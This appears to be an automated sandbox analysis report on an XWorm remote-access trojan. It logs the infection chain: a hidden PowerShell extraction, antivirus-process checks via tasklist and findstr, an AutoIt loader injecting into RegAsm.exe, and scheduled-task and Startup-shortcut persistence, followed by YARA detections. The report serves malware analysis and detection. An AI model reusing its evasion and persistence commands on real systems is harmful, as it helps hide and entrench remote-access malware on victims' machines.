Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 220239
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "DimPieLilHot" Statistical
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Response + ..\Fires + ..\Automatic F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Carter.pif F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Process created: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\danielpulse.url" & echo url="c:\users\user\appdata\local\cloudsynergy solutions\danielpulse.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\danielpulse.url" & exit
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\danielpulse.url" & echo url="c:\users\user\appdata\local\cloudsynergy solutions\danielpulse.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\danielpulse.url" & exit

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

24_2_00AD88CD

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 24_2_00AE4F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

24_2_00AE4F1C

Source: msword.exe, 0000000E.00000003.2557835042.0000000002A2A000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000000.2595689142.0000000000B36000.00000002.00000001.01000000.0000000F.sdmp, Carter.pif, 00000018.00000003.2605347135.00000000044E6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: RegAsm.exe, 00000023.00000002.4500241219.00000000029DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $]q'PING!<Xwormmm>Program Manager<Xwormmm>0Te]qt
Source: RegAsm.exe, 00000023.00000002.4500241219.00000000029DD000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.4500241219.00000000029D2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.4500241219.00000000029BB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: Carter.pif, DanielPulse.scr	Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 00000023.00000002.4500241219.00000000029DD000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.4500241219.00000000029D2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.4500241219.00000000029BB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managert-]q
Source: RegAsm.exe, 00000023.00000002.4500241219.00000000029DD000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.4500241219.00000000029D2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.4500241219.00000000029BB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: RegAsm.exe, 00000023.00000002.4500241219.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $]q'PING!<Xwormmm>Program Manager<Xwormmm>0Te]qLh
Source: RegAsm.exe, 00000023.00000002.4500241219.00000000029D2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.4500241219.00000000029BB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.4500241219.00000000029B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $]q'PING!<Xwormmm>Program Manager<Xwormmm>0Te]q
Source: RegAsm.exe, 00000023.00000002.4500241219.00000000029DD000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.4500241219.00000000029D2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.4500241219.00000000029BB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: @\]q@\]q'PING!<Xwormmm>Program Manager<Xwormmm>0

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 24_2_00AA885B cpuid

24_2_00AA885B

Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 24_2_00AC0030 GetLocalTime,__swprintf,

24_2_00AC0030

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 24_2_00AC0722 GetUserNameW,

24_2_00AC0722

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 24_2_00AB416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

24_2_00AB416A

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 14_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

14_2_00406805

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: RegAsm.exe, 00000023.00000002.4498969809.0000000000B58000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Blob

Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 24.2.Carter.pif.426ba60.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Carter.pif.426ba60.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.RegAsm.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.Carter.pif.426ba60.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.Carter.pif.426ba60.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000003.3881968473.0000000004261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.3881936961.00000000042C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.4498694614.0000000000762000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.4500843743.000000000426B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.3881856038.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.4500241219.00000000029BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.3826189129.0000000001B47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.4500241219.0000000002971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.3881856038.0000000004289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Carter.pif PID: 5900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7416, type: MEMORYSTR

Source: DanielPulse.scr	Binary or memory string: WIN_81
Source: DanielPulse.scr	Binary or memory string: WIN_XP
Source: DanielPulse.scr	Binary or memory string: WIN_XPe
Source: DanielPulse.scr	Binary or memory string: WIN_VISTA
Source: DanielPulse.scr	Binary or memory string: WIN_7
Source: DanielPulse.scr	Binary or memory string: WIN_8
Source: Carter.pif.15.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 24.2.Carter.pif.426ba60.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Carter.pif.426ba60.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.RegAsm.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.Carter.pif.426ba60.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.Carter.pif.426ba60.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000003.3881968473.0000000004261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.3881936961.00000000042C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.4498694614.0000000000762000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.4500843743.000000000426B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
